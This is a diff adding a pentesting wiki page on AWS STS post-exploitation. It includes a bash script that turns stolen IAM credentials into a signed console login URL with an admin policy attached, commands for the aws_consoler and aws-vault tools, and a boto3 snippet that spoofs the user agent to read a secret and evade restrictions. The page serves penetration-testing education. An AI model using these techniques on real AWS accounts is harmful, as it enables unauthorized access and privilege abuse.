Migrate to using mdbook

src/pentesting-cloud/aws-security/aws-post-exploitation/aws-sts-post-exploitation.md

@@ -0,0 +1,104 @@
+# AWS - STS Post Exploitation
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## STS
+
+For more information:
+
+{{#ref}}
+../aws-services/aws-iam-enum.md
+{{#endref}}
+
+### From IAM Creds to Console
+
+If you have managed to obtain some IAM credentials you might be interested on **accessing the web console** using the following tools.\
+Note that the the user/role must have the permission **`sts:GetFederationToken`**.
+
+#### Custom script
+
+The following script will use the default profile and a default AWS location (not gov and not cn) to give you a signed URL you can use to login inside the web console:
+
+```bash
+# Get federated creds (you must indicate a policy or they won't have any perms)
+## Even if you don't have Admin access you can indicate that policy to make sure you get all your privileges
+## Don't forget to use [--profile <prof_name>] in the first line if you need to
+output=$(aws sts get-federation-token --name consoler --policy-arns arn=arn:aws:iam::aws:policy/AdministratorAccess)
+
+if [ $? -ne 0 ]; then
+    echo "The command 'aws sts get-federation-token --name consoler' failed with exit status $status"
+    exit $status
+fi
+
+# Parse the output
+session_id=$(echo $output | jq -r '.Credentials.AccessKeyId')
+session_key=$(echo $output | jq -r '.Credentials.SecretAccessKey')
+session_token=$(echo $output | jq -r '.Credentials.SessionToken')
+
+# Construct the JSON credentials string
+json_creds=$(echo -n "{\"sessionId\":\"$session_id\",\"sessionKey\":\"$session_key\",\"sessionToken\":\"$session_token\"}")
+
+# Define the AWS federation endpoint
+federation_endpoint="https://signin.aws.amazon.com/federation"
+
+# Make the HTTP request to get the sign-in token
+resp=$(curl -s "$federation_endpoint" \
+    --get \
+    --data-urlencode "Action=getSigninToken" \
+    --data-urlencode "SessionDuration=43200" \
+    --data-urlencode "Session=$json_creds"
+)
+signin_token=$(echo -n $resp | jq -r '.SigninToken' | tr -d '\n' | jq -sRr @uri)
+
+
+
+# Give the URL to login
+echo -n "https://signin.aws.amazon.com/federation?Action=login&Issuer=example.com&Destination=https%3A%2F%2Fconsole.aws.amazon.com%2F&SigninToken=$signin_token"
+```
+
+#### aws_consoler
+
+You can **generate a web console link** with [https://github.com/NetSPI/aws_consoler](https://github.com/NetSPI/aws_consoler).
+
+```bash
+cd /tmp
+python3 -m venv env
+source ./env/bin/activate
+pip install aws-consoler
+aws_consoler [params...] #This will generate a link to login into the console
+```
+
+> [!WARNING]
+> Ensure the IAM user has `sts:GetFederationToken` permission, or provide a role to assume.
+
+#### aws-vault
+
+[**aws-vault**](https://github.com/99designs/aws-vault) is a tool to securely store and access AWS credentials in a development environment.
+
+```bash
+aws-vault list
+aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with jonsmith creds
+aws-vault login jonsmith # Open a browser logged as jonsmith
+```
+
+> [!NOTE]
+> You can also use **aws-vault** to obtain an **browser console session**
+
+### **Bypass User-Agent restrictions from Python**
+
+If there is a **restriction to perform certain actions based on the user agent** used (like restricting the use of python boto3 library based on the user agent) it's possible to use the previous technique to **connect to the web console via a browser**, or you could directly **modify the boto3 user-agent** by doing:
+
+```bash
+# Shared by ex16x41
+# Create a client
+session = boto3.Session(profile_name="lab6")
+client = session.client("secretsmanager", region_name="us-east-1")
+
+# Change user agent of the client
+client.meta.events.register( 'before-call.secretsmanager.GetSecretValue', lambda params, **kwargs: params['headers'].update({'User-Agent': 'my-custom-tool'}) )
+
+# Perform the action
+response = client.get_secret_value(SecretId="flag_secret") print(response['SecretString'])
+```
+
+{{#include ../../../banners/hacktricks-training.md}}